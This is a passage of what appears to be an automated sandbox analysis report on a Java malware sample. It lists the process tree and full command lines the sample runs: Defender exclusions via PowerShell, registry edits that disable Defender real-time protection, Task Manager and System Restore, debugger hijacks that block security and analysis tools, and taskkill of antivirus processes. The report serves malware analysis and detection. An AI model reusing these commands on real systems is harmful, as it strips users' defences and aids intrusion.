4256 cmd.exe 344 PID 4256 wrote to memory of 3640 4256 cmd.exe 345 PID 4256 wrote to memory of 3640 4256 cmd.exe 345 PID 2584 wrote to memory of 344 2584 java.exe 346 PID 2584 wrote to memory of 344 2584 java.exe 346 PID 344 wrote to memory of 392 344 cmd.exe 348 PID 344 wrote to memory of 392 344 cmd.exe 348 PID 344 wrote to memory of 4484 344 cmd.exe 349 PID 344 wrote to memory of 4484 344 cmd.exe 349 PID 2584 wrote to memory of 5104 2584 java.exe 350 PID 2584 wrote to memory of 5104 2584 java.exe 350 PID 5104 wrote to memory of 3708 5104 cmd.exe 352 PID 5104 wrote to memory of 3708 5104 cmd.exe 352 PID 5104 wrote to memory of 4628 5104 cmd.exe 353 PID 5104 wrote to memory of 4628 5104 cmd.exe 353 PID 2584 wrote to memory of 3844 2584 java.exe 354 PID 2584 wrote to memory of 3844 2584 java.exe 354 PID 3844 wrote to memory of 2184 3844 cmd.exe 356 PID 3844 wrote to memory of 2184 3844 cmd.exe 356 PID 3844 wrote to memory of 4444 3844 cmd.exe 357 PID 3844 wrote to memory of 4444 3844 cmd.exe 357 PID 2584 wrote to memory of 4440 2584 java.exe 358 PID 2584 wrote to memory of 4440 2584 java.exe 358 PID 4440 wrote to memory of 4836 4440 cmd.exe 360 PID 4440 wrote to memory of 4836 4440 cmd.exe 360 PID 4440 wrote to memory of 1684 4440 cmd.exe 361 PID 4440 wrote to memory of 1684 4440 cmd.exe 361 PID 2584 wrote to memory of 4308 2584 java.exe 362 PID 2584 wrote to memory of 4308 2584 java.exe 362 PID 2584 wrote to memory of 4352 2584 java.exe 364 PID 2584 wrote to memory of 4352 2584 java.exe 364 PID 4352 wrote to memory of 4116 4352 cmd.exe 366 PID 4352 wrote to memory of 4116 4352 cmd.exe 366 PID 4352 wrote to memory of 2908 4352 cmd.exe 367 PID 4352 wrote to memory of 2908 4352 cmd.exe 367 PID 2584 wrote to memory of 5072 2584 java.exe 368 PID 2584 wrote to memory of 5072 2584 java.exe 368 PID 5072 wrote to memory of 4204 5072 cmd.exe 370 PID 5072 wrote to memory of 4204 5072 cmd.exe 370 PID 5072 wrote to memory of 4464 5072 cmd.exe 371 PID 5072 wrote to memory of 4464 5072 cmd.exe 371 PID 2584 wrote to memory of 3152 2584 java.exe 372 PID 2584 wrote to memory of 3152 2584 java.exe 372 PID 3152 wrote to memory of 3348 3152 cmd.exe 374 PID 3152 wrote to memory of 3348 3152 cmd.exe 374 PID 3152 wrote to memory of 4684 3152 cmd.exe 375 PID 3152 wrote to memory of 4684 3152 cmd.exe 375 PID 2584 wrote to memory of 4052 2584 java.exe 376 PID 2584 wrote to memory of 4052 2584 java.exe 376 PID 2584 wrote to memory of 4700 2584 java.exe 378 PID 2584 wrote to memory of 4700 2584 java.exe 378 PID 2584 wrote to memory of 2224 2584 java.exe 380 PID 2584 wrote to memory of 2224 2584 java.exe 380 PID 2584 wrote to memory of 1456 2584 java.exe 382 PID 2584 wrote to memory of 1456 2584 java.exe 382 PID 2584 wrote to memory of 4548 2584 java.exe 384 PID 2584 wrote to memory of 4548 2584 java.exe 384 PID 2584 wrote to memory of 4128 2584 java.exe 386 PID 2584 wrote to memory of 4128 2584 java.exe 386 PID 2584 wrote to memory of 4788 2584 java.exe 388 PID 2584 wrote to memory of 4788 2584 java.exe 388 PID 2584 wrote to memory of 4416 2584 java.exe 390 PID 2584 wrote to memory of 4416 2584 java.exe 390 PID 2584 wrote to memory of 4356 2584 java.exe 392 PID 2584 wrote to memory of 4356 2584 java.exe 392 -
Views/modifies file attributes 1 TTPs 8 IoCs
pid Process 3684 attrib.exe 2944 attrib.exe 744 attrib.exe 2224 attrib.exe 3816 attrib.exe 3344 attrib.exe 3388 attrib.exe 3368 attrib.exe
Processes
-
C:\ProgramData\Oracle\Java\javapath\java.exejava -jar C:\Users\Admin\AppData\Local\Temp\08028.jar1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2584 -
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2260
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1588
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:2168 -
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1028
-
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\Oracle2⤵
- Views/modifies file attributes
PID:2224
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +r +s C:\Users\Admin\.ntusernt.ini2⤵
- Views/modifies file attributes
PID:3816
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\hHEiU\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:3344
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\hHEiU\Desktop.ini2⤵
- Drops desktop.ini file(s)
- Views/modifies file attributes
PID:3388
-
-
C:\Windows\SYSTEM32\attrib.exeattrib -s -r C:\Users\Admin\hHEiU2⤵
- Views/modifies file attributes
PID:3368
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +s +r C:\Users\Admin\hHEiU2⤵
- Views/modifies file attributes
PID:3684
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h C:\Users\Admin\hHEiU2⤵
- Views/modifies file attributes
PID:2944
-
-
C:\Windows\SYSTEM32\attrib.exeattrib +h +s +r C:\Users\Admin\hHEiU\RAvDP.class2⤵
- Views/modifies file attributes
PID:744
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3704 -
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:2252
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:4596
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\hHEiU','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\hHEiU\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1312
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F2⤵
- Kills process with taskkill
PID:2164
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3852
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f2⤵PID:780
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:2188
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f2⤵PID:3548
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3716
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f2⤵PID:196
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f2⤵PID:3556
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:572
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:3912
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3844
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4176
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f2⤵PID:4184
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f2⤵PID:4308
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4340
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f2⤵PID:4436
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F2⤵
- Kills process with taskkill
PID:4464
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4476
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4552
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f2⤵PID:4560
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4716
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:4732
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4820
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:4884
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4972
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:4984
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:5044
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:5052
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:3408
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4164
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:643⤵PID:4812
-
-
C:\Windows\system32\reg.exereg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:323⤵PID:4352
-
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4144
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4276
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F2⤵
- Kills process with taskkill
PID:1440
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4364
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4504
-
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:642⤵PID:4668
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4184
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:643⤵PID:4264
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:323⤵PID:4460
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F2⤵
- Kills process with taskkill
PID:4828
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4876
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:643⤵PID:4424
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:323⤵PID:4688
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4744
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:643⤵PID:4768
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:323⤵PID:4700
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F2⤵
- Kills process with taskkill
PID:4692
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4856
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:643⤵PID:4672
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:323⤵PID:4844
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4852
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:643⤵PID:4716
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:323⤵PID:4860
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:780
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:643⤵PID:4288
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:323⤵PID:4976
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3388
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:643⤵PID:3096
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:323⤵PID:3820
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3584
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:643⤵PID:3644
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:323⤵PID:2844
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3776
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:643⤵PID:3748
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:323⤵PID:1996
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3972
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:643⤵PID:1840
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:323⤵PID:388
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3504
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:643⤵PID:4228
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:323⤵PID:208
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2956
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:643⤵PID:4420
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:323⤵PID:4604
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F2⤵
- Kills process with taskkill
PID:4540
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4356
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:643⤵PID:3708
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:323⤵PID:4896
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4464
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:643⤵PID:932
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:323⤵PID:4060
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3964
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:643⤵PID:4148
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:323⤵PID:2968
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4408
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:643⤵PID:4868
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:323⤵PID:4388
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4828
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:643⤵PID:4308
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:323⤵PID:4500
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4616
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:643⤵PID:4720
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:323⤵PID:4516
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F2⤵
- Kills process with taskkill
PID:4688
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4640
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:643⤵PID:2400
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:323⤵PID:4716
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4816
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:643⤵PID:4884
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:323⤵PID:4104
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:3096
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:643⤵PID:420
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:323⤵PID:2016
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1564
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:643⤵PID:1996
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:323⤵PID:4244
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2148
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:643⤵PID:4548
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:323⤵PID:344
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:8
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:643⤵PID:3188
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:323⤵PID:3372
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:1036
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:643⤵PID:4128
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:323⤵PID:4528
-
-
-
C:\Windows\System32\taskkill.exe"C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F2⤵
- Kills process with taskkill
PID:4472
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2772
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:643⤵PID:5004
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:323⤵PID:3908
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4060
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:643⤵PID:4280
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:323⤵PID:4320
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:4600
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:643⤵PID:4340
-
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0000-1000-0000000FF1CE}" /reg:323⤵PID:4308
-
-
-
C:\Windows\SYSTEM32\cmd.execmd.exe2⤵PID:2232
-
C:\Windows\system32\reg.exereg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-008C-0409-1000-0000000FF1CE}" /reg:643⤵PID:4276
-
-
